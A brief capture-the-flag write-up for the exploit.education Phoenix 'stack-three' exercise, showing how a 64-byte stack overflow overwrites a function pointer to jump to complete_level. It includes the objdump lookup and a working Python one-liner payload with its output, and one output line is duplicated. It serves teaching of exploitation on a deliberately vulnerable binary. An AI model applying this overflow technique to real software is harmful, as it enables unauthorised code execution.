Write-up for: Stack Three

This is again very similar, but this time we are overwriting a function pointer via stdin.

user@phoenix-amd64:/opt/phoenix/i486$ ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
calling function pointer @ 0x41414141
Segmentation fault

The buffer is again 64 bytes large. Thus we can precisely target the function pointer value. Where do we want to jump instead? Looking at the symbols we can see a function called complete_level:

objdump -t stack-three
08048535 g     F .text  00000020 complete_level

Since we have no memory protection, let’s just jump there

user@phoenix-amd64:/opt/phoenix/i486$ python -c 'print "A"*64 + "\x08\x04\x85\x35"[::-1]' | ./stack-three
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x8048535
Congratulations, you've finished phoenix/stack-three :-) Well done!ongratulations, you've finished phoenix/stack-three :-) Well done!

Don’t forget the little endianness ;)